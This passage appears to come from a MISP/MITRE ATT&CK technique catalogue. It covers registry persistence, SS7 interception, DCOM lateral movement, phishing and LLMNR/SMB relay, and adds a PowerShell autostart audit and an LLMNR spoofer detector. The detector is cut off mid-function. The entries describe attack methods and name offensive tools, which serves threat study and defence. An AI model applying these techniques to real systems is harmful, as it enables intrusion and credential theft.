is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.
Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.
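As an added defensive example (not part of the MITRE/MISP entry), the following PowerShell audit walks the autostart locations listed above, including the RunOnceEx Depend subkeys, and flags values that differ from a stock installation. The expected default values for Userinit, Shell and BootExecute are assumptions about an unmodified Windows install; run it in an elevated session.

```powershell
# Added audit example; not code from the MITRE/MISP page.
# Lists every program registered in the autostart locations described above and
# flags values that deviate from assumed stock-Windows defaults.

function Get-RegValues {
    # Return name/data pairs for every value under a key, skipping PowerShell's
    # own PS* metadata properties. A missing key yields nothing, not an error.
    param([string]$Path)
    if (-not (Test-Path -Path $Path)) { return }
    $item = Get-ItemProperty -Path $Path
    foreach ($p in $item.PSObject.Properties) {
        if ($p.Name -like 'PS*') { continue }
        [pscustomobject]@{ Key = $Path; Name = $p.Name; Data = ($p.Value -join ' ') }
    }
}

# 1. Run / RunOnce / RunServices / policy Run keys: every value is a program
#    that will be started, so list all of them for review.
$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServices',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunServices',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
)
$findings = @(foreach ($k in $runKeys) { Get-RegValues -Path $k })

# 2. RunOnceEx: entries may sit one level down in numbered subkeys and their
#    Depend subkeys (the DLL-loading case quoted above), so walk recursively.
$roe = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnceEx'
if (Test-Path -Path $roe) {
    $findings += @(Get-RegValues -Path $roe)
    $findings += @(Get-ChildItem -Path $roe -Recurse | ForEach-Object { Get-RegValues -Path $_.PSPath })
}

# 3. Values that should match a known default; anything else deserves a look.
#    The expected strings are assumptions for an unmodified Windows install.
$expected = @{
    'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon|Userinit' = 'C:\Windows\system32\userinit.exe,'
    'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon|Shell'    = 'explorer.exe'
    'HKLM:\System\CurrentControlSet\Control\Session Manager|BootExecute'   = 'autocheck autochk *'
    'HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Windows|load'      = ''
}
foreach ($entry in $expected.GetEnumerator()) {
    $key, $name = $entry.Key -split '\|'
    # Multi-string values (BootExecute) are joined so they compare as one line.
    $actual = (Get-ItemProperty -Path $key -Name $name -ErrorAction SilentlyContinue).$name -join ' '
    if ($actual -ne $entry.Value) {
        $findings += @([pscustomobject]@{
            Key  = $key
            Name = $name
            Data = "$actual  (expected: '$($entry.Value)')"
        })
    }
}

# 4. Startup-folder redirection: the Startup / Common Startup paths in these
#    keys decide which folder is executed at logon, so show where they point.
$shellKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders'
)
$findings += @(foreach ($k in $shellKeys) {
    Get-RegValues -Path $k | Where-Object { $_.Name -in 'Startup', 'Common Startup' }
})

$findings | Sort-Object Key, Name | Format-Table -AutoSize -Wrap
```

Compare the output against a known-good baseline from the same image; a Run value pointing into a user-writable directory or a BootExecute line with extra entries is the signal to investigate.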
Internal MISP references
UUID 9422fc14-1c43-410d-ab0f-a709b76c72dc
which can be used as unique global reference for Registry Run Keys / Startup Folder - T1060
in MISP communities and other software using the MISP galaxy
External references
- http://msdn.microsoft.com/en-us/library/aa376977 - webarchive
- https://attack.mitre.org/techniques/T1060 - webarchive
- https://capec.mitre.org/data/definitions/270.html - webarchive
- https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ - webarchive
- https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key - webarchive
- https://technet.microsoft.com/en-us/sysinternals/bb963902 - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1060 |
kill_chain | ['attack-Windows:persistence'] |
mitre_platforms | ['Windows'] |
Exploit SS7 to Redirect Phone Calls/SMS - T1449
An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as an adversary-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication. (Citation: TheRegister-SS7)
Internal MISP references
UUID fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d
which can be used as unique global reference for Exploit SS7 to Redirect Phone Calls/SMS - T1449
in MISP communities and other software using the MISP galaxy
External references
- http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf - webarchive
- https://attack.mitre.org/techniques/T1449 - webarchive
- https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-37.html - webarchive
- https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf - webarchive
- https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf - webarchive
- https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/ - webarchive
- https://www.youtube.com/watch?v=q0n5ySqbfdI - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1449 |
kill_chain | ['mobile-attack-Android:network-effects', 'mobile-attack-iOS:network-effects'] |
mitre_platforms | ['Android', 'iOS'] |
Assess security posture of physical locations - T1302
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Physical access may be required for certain types of adversarial actions. (Citation: CyberPhysicalAssessment) (Citation: CriticalInfrastructureAssessment)
Internal MISP references
UUID 31a57c70-6709-4d06-a473-c3df1f74c1d4
which can be used as unique global reference for Assess security posture of physical locations - T1302
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1302 |
kill_chain | ['pre-attack:organizational-weakness-identification'] |
Determine domain and IP address space - T1250
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Domain Names are the human readable names used to represent one or more IP addresses. IP addresses are the unique identifier of computing devices on a network. Both pieces of information are valuable to an adversary who is looking to understand the structure of a network. (Citation: RSA-APTRecon)
Internal MISP references
UUID 23ecb7e0-0340-43d9-80a5-8971fe866ddf
which can be used as unique global reference for Determine domain and IP address space - T1250
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1250 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Research visibility gap of security vendors - T1290
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
If an adversary can identify which security tools a victim is using they may be able to identify ways around those tools. (Citation: CrowdStrike Putter Panda)
Internal MISP references
UUID b26babc7-9127-4bd5-9750-5e49748c9be3
which can be used as unique global reference for Research visibility gap of security vendors - T1290
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1290 |
kill_chain | ['pre-attack:technical-weakness-identification'] |
Exploit SS7 to Track Device Location - T1450
An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)
Internal MISP references
UUID 52651225-0b3a-482d-aa7e-10618fd063b5
which can be used as unique global reference for Exploit SS7 to Track Device Location - T1450
in MISP communities and other software using the MISP galaxy
External references
- http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf - webarchive
- https://attack.mitre.org/techniques/T1450 - webarchive
- https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html - webarchive
- https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf - webarchive
- https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf - webarchive
- https://www.youtube.com/watch?v=q0n5ySqbfdI - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1450 |
kill_chain | ['mobile-attack-Android:network-effects', 'mobile-attack-iOS:network-effects'] |
mitre_platforms | ['Android', 'iOS'] |
Access Sensitive Data in Device Logs - T1413
On versions of Android prior to 4.1, an adversary may use a malicious application that holds the READ_LOGS permission to obtain private keys, passwords, other credentials, or other sensitive data stored in the device's system log. On Android 4.1 and later, an adversary would need to attempt to perform an operating system privilege escalation attack to be able to access the log.
Internal MISP references
UUID 29e07491-8947-43a3-8d4e-9a787c45f3d3
which can be used as unique global reference for Access Sensitive Data in Device Logs - T1413
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1413 |
kill_chain | ['mobile-attack-Android:collection', 'mobile-attack-Android:credential-access'] |
mitre_platforms | ['Android'] |
Stolen Developer Credentials or Signing Keys - T1441
An adversary could steal developer account credentials on an app store and/or signing keys to publish malicious updates to existing Android or iOS apps, or to abuse the developer's identity and reputation to publish new malicious applications. For example, Infoworld describes this technique and suggests mitigations in (Citation: Infoworld-Appstore).
Detection: Developers can regularly scan (or have a third party scan on their behalf) the app stores for presence of unauthorized apps that were submitted using the developer's identity.
Platforms: Android, iOS
Internal MISP references
UUID a21a6a79-f9a1-4c87-aed9-ba2d79536881
which can be used as unique global reference for Stolen Developer Credentials or Signing Keys - T1441
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1441 |
Component Object Model and Distributed COM - T1175
This technique has been deprecated. Please use Distributed Component Object Model and Component Object Model.
Adversaries may use the Windows Component Object Model (COM) and Distributed Component Object Model (DCOM) for local code execution or to execute on remote systems as part of lateral movement.
COM is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) DCOM is transparent middleware that extends the functionality of Component Object Model (COM) (Citation: Microsoft COM) beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)
Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry. (Citation: Microsoft COM ACL)(Citation: Microsoft Process Wide Com Keys)(Citation: Microsoft System Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.
Adversaries may abuse COM for local command and/or payload execution. Various COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and VBScript.(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a Scheduled Task/Job, fileless download/execution, and other adversary behaviors such as Privilege Escalation and Persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)
Adversaries may use DCOM for lateral movement. Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications (Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents (Citation: Enigma Excel DCOM Sept 2017) and may also invoke Dynamic Data Exchange (DDE) execution directly through a COM created instance of a Microsoft Office application (Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document.
Internal MISP references
UUID 772bc7a8-a157-42cc-8728-d648e25c7fe7
which can be used as unique global reference for Component Object Model and Distributed COM - T1175
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1175 - webarchive
- https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1 - webarchive
- https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/ - webarchive
- https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/ - webarchive
- https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/ - webarchive
- https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/ - webarchive
- https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html - webarchive
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx - webarchive
- https://msdn.microsoft.com/en-us/library/windows/desktop/ms694331(v=vs.85).aspx - webarchive
- https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx - webarchive
- https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom - webarchive
- https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1175 |
kill_chain | ['attack-Windows:lateral-movement', 'attack-Windows:execution'] |
mitre_platforms | ['Windows'] |
Develop social network persona digital footprint - T1342
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Both newly built personas and pre-compromised personas may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)
Internal MISP references
UUID 271e6d40-e191-421a-8f87-a8102452c201
which can be used as unique global reference for Develop social network persona digital footprint - T1342
in MISP communities and other software using the MISP galaxy
External references
- http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf - webarchive
- https://attack.mitre.org/techniques/T1342 - webarchive
- https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1342 |
kill_chain | ['pre-attack:persona-development'] |
Assess vulnerability of 3rd party vendors - T1298
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Once a 3rd party vendor has been identified as being of interest it can be probed for vulnerabilities just like the main target would be. (Citation: Zetter2015Threats) (Citation: WSJTargetBreach)
Internal MISP references
UUID 1def484d-2343-470d-8925-88f45b5f9615
which can be used as unique global reference for Assess vulnerability of 3rd party vendors - T1298
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1298 |
kill_chain | ['pre-attack:organizational-weakness-identification'] |
Manipulate App Store Rankings or Ratings - T1452
An adversary could use access to a compromised device's credentials to attempt to manipulate app store rankings or ratings by triggering application downloads or posting fake reviews of applications. This technique likely requires privileged access (a rooted or jailbroken device).
Internal MISP references
UUID 76c12fc8-a4eb-45d6-a3b7-e371a7248f69
which can be used as unique global reference for Manipulate App Store Rankings or Ratings - T1452
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1452 |
kill_chain | ['mobile-attack-Android:impact', 'mobile-attack-iOS:impact'] |
mitre_platforms | ['Android', 'iOS'] |
Acquire OSINT data sets and information - T1247
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line, such as from search engines, as well as in the physical world. (Citation: RSA-APTRecon)
Internal MISP references
UUID 784ff1bc-1483-41fe-a172-4cd9ae25c06b
which can be used as unique global reference for Acquire OSINT data sets and information - T1247
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1247 |
kill_chain | ['pre-attack:technical-information-gathering'] |
Acquire OSINT data sets and information - T1266
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Open source intelligence (OSINT) provides free, readily available information about a target while providing the target no indication they are of interest. Such information can assist an adversary in crafting a successful approach for compromise. (Citation: RSA-APTRecon)
Internal MISP references
UUID 2b9a666e-bd59-4f67-9031-ed41b428e04a
which can be used as unique global reference for Acquire OSINT data sets and information - T1266
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1266 |
kill_chain | ['pre-attack:people-information-gathering'] |
Acquire OSINT data sets and information - T1277
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Data sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)
Internal MISP references
UUID 028ad431-84c5-4eb7-a364-2b797c234f88
which can be used as unique global reference for Acquire OSINT data sets and information - T1277
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1277 |
kill_chain | ['pre-attack:organizational-information-gathering'] |
Assess opportunities created by business deals - T1299
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
During mergers, divestitures, or other periods of change in joint infrastructure or business processes there may be an opportunity for exploitation. During this type of churn, unusual requests or other non-standard practices may not be as noticeable. (Citation: RossiMergers) (Citation: MeidlHealthMergers)
Internal MISP references
UUID e2aa077d-60c9-4de5-b015-a9c382877cd9
which can be used as unique global reference for Assess opportunities created by business deals - T1299
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1299 |
kill_chain | ['pre-attack:organizational-weakness-identification'] |
SSL certificate acquisition for trust breaking - T1338
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Fake certificates can be acquired by legal process or coercion, or an adversary can trick a Certificate Authority into issuing a certificate. These fake certificates can be used as a part of Man-in-the-Middle attacks. (Citation: SubvertSSL)
Internal MISP references
UUID 54a42187-a20c-4e4e-ba31-8d15c9e1f57f
which can be used as unique global reference for SSL certificate acquisition for trust breaking - T1338
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1338 |
kill_chain | ['pre-attack:establish-&-maintain-infrastructure'] |
Identify resources required to build capabilities - T1348
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
As with legitimate development efforts, different skill sets may be required for different phases of an attack. The skills needed may be located in house, can be developed, or may need to be contracted out. (Citation: APT1)
Internal MISP references
UUID c9fb4451-729d-4771-b205-52c1829f949c
which can be used as unique global reference for Identify resources required to build capabilities - T1348
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1348 |
kill_chain | ['pre-attack:build-capabilities'] |
Hardware or software supply chain implant - T1365
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
During production and distribution, software, firmware, or a CPU chip may be placed in a computer, handheld, or other electronic device to enable an adversary to gain illegal entrance. (Citation: McDRecall) (Citation: SeagateMaxtor)
Internal MISP references
UUID 388f3a5c-2cdd-466c-9159-b507fa429fcd
which can be used as unique global reference for Hardware or software supply chain implant - T1365
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1365 |
kill_chain | ['pre-attack:stage-capabilities'] |
Test malware in various execution environments - T1357
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
Malware may perform differently on different platforms (computer vs handheld), different operating systems (Ubuntu vs OS X), and different versions (Windows 7 vs 10), so malicious actors will test their malware in the environment(s) where they most expect it to be executed. (Citation: BypassMalwareDefense)
Internal MISP references
UUID e042a41b-5ecf-4f3a-8f1f-1b528c534772
which can be used as unique global reference for Test malware in various execution environments - T1357
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1357 |
kill_chain | ['pre-attack:test-capabilities'] |
Conduct social engineering or HUMINT operation - T1376
This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.
Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. Human Intelligence (HUMINT) is intelligence collected and provided by human sources. (Citation: 17millionScam) (Citation: UbiquityEmailScam)
Internal MISP references
UUID b79a1960-d0be-4b51-bb62-b27e91e1dea0
which can be used as unique global reference for Conduct social engineering or HUMINT operation - T1376
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1376 |
kill_chain | ['pre-attack:launch'] |
Spear phishing messages with malicious attachments - T1367
This technique has been deprecated. Please use Spearphishing Attachment.
Emails with malicious attachments are designed to get a user to open/execute the attachment in order to deliver malware payloads. (Citation: APT1)
Internal MISP references
UUID e24a9f99-cb76-42a3-a50b-464668773e97
which can be used as unique global reference for Spear phishing messages with malicious attachments - T1367
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1367 |
kill_chain | ['pre-attack:launch'] |
Authorized user performs requested cyber action - T1386
This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.
Clicking on links in email, opening attachments, or visiting websites that result in drive by downloads can all result in compromise due to users performing actions of a cyber nature. (Citation: AnonHBGary)
Internal MISP references
UUID 0440f60f-9056-4791-a740-8eae96eb61fa
which can be used as unique global reference for Authorized user performs requested cyber action - T1386
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1386 |
kill_chain | ['pre-attack:compromise'] |
Spear phishing messages with text only - T1368
This technique has been deprecated. Please use Phishing where appropriate.
Emails with text-only phishing messages do not contain any attachments or links to websites. They are designed to get a user to take a follow-on action such as calling a phone number or wiring money. They can also be used to elicit an email response to confirm the existence of an account or user. (Citation: Paypal Phone Scam)
Internal MISP references
UUID 2fc04aa5-48c1-49ec-919a-b88241ef1d17
which can be used as unique global reference for Spear phishing messages with text only - T1368
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1368 |
kill_chain | ['pre-attack:launch'] |
Spear phishing messages with malicious links - T1369
This technique has been deprecated. Please use Spearphishing Link.
Emails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)
Internal MISP references
UUID 489a7797-01c3-4706-8cd1-ec56a9db3adc
which can be used as unique global reference for Spear phishing messages with malicious links - T1369
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1369 |
kill_chain | ['pre-attack:launch'] |
Unauthorized user introduces compromise delivery mechanism - T1387
This technique has been deprecated. Please use Hardware Additions where appropriate.
If an adversary can gain physical access to the target's environment they can introduce a variety of devices that provide compromise mechanisms. This could include installing keyboard loggers, adding routing/wireless equipment, or connecting computing devices. (Citation: Credit Card Skimmers)
Internal MISP references
UUID b3253d9e-ba11-430f-b5a3-4db844ce5413
which can be used as unique global reference for Unauthorized user introduces compromise delivery mechanism - T1387
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1387 |
kill_chain | ['pre-attack:compromise'] |
Deliver Malicious App via Other Means - T1476
Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.
Delivery methods for the malicious application include:
- Spearphishing Attachment - Including the mobile app package as an attachment to an email message.
- Spearphishing Link - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.
- Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)
Some Android malware comes with functionality to install additional applications, either automatically or when the adversary instructs it to.(Citation: android-trojan-steals-paypal-2fa)
Internal MISP references
UUID 53263a67-075e-48fa-974b-91c5b5445db7
which can be used as unique global reference for Deliver Malicious App via Other Means - T1476
in MISP communities and other software using the MISP galaxy
External references
- https://attack.mitre.org/techniques/T1476 - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/ - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html - webarchive
- https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html - webarchive
- https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861 - webarchive
- https://www.welivesecurity.com/2018/12/11/android-trojan-steals-money-paypal-accounts-2fa/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
external_id | T1476 |
kill_chain | ['mobile-attack-Android:initial-access', 'mobile-attack-iOS:initial-access'] |
mitre_platforms | ['Android', 'iOS'] |
Upload, install, and configure software/tools - T1362
This object is deprecated as its content has been merged into the enterprise domain. Please see the PRE matrix for its replacement. The prior content of this page has been preserved here.
An adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)
Internal MISP references
UUID e8471f43-2742-4fd7-9af7-8ed1330ada37
which can be used as unique global reference for Upload, install, and configure software/tools - T1362
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
external_id | T1362 |
kill_chain | ['pre-attack:stage-capabilities'] |
LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001
By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials.
Link-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR)(Citation: TechNet NetBIOS)
Adversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords.
In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it.(Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay) Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response.
Several tools may be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder.(Citation: GitHub NBNSpoof)(Citation: Rapid7 LLMNR Spoofer)(Citation: GitHub Responder)
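A defender-side check for the poisoning described above, in the spirit of the Conveigh detector listed under the references: query LLMNR for a canary host name that no legitimate machine carries, so any answer identifies a spoofer. This is an added example, not code from the ATT&CK entry or from Conveigh; the canary name, transaction ID and captured response bytes are constructed.

```python
import struct

# LLMNR reuses the DNS message format over UDP port 5355 (see the entry above);
# its IPv4 multicast group is 224.0.0.252.
LLMNR_PORT = 5355
QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """Encode a host name as DNS-style length-prefixed labels."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        if not 0 < len(raw) < 64:
            raise ValueError("label length out of range")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_llmnr_query(name: str, txid: int) -> bytes:
    """Standard query: flags 0, one question, no other records."""
    header = struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", QTYPE_A, QCLASS_IN)


def decode_name(msg: bytes, offset: int):
    """Decode a name that may use DNS compression pointers; returns (name, next_offset)."""
    labels, jumped, end = [], False, offset
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:  # two-byte pointer into an earlier name
            pointer = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            if not jumped:
                end = offset + 2
            jumped, offset = True, pointer
            continue
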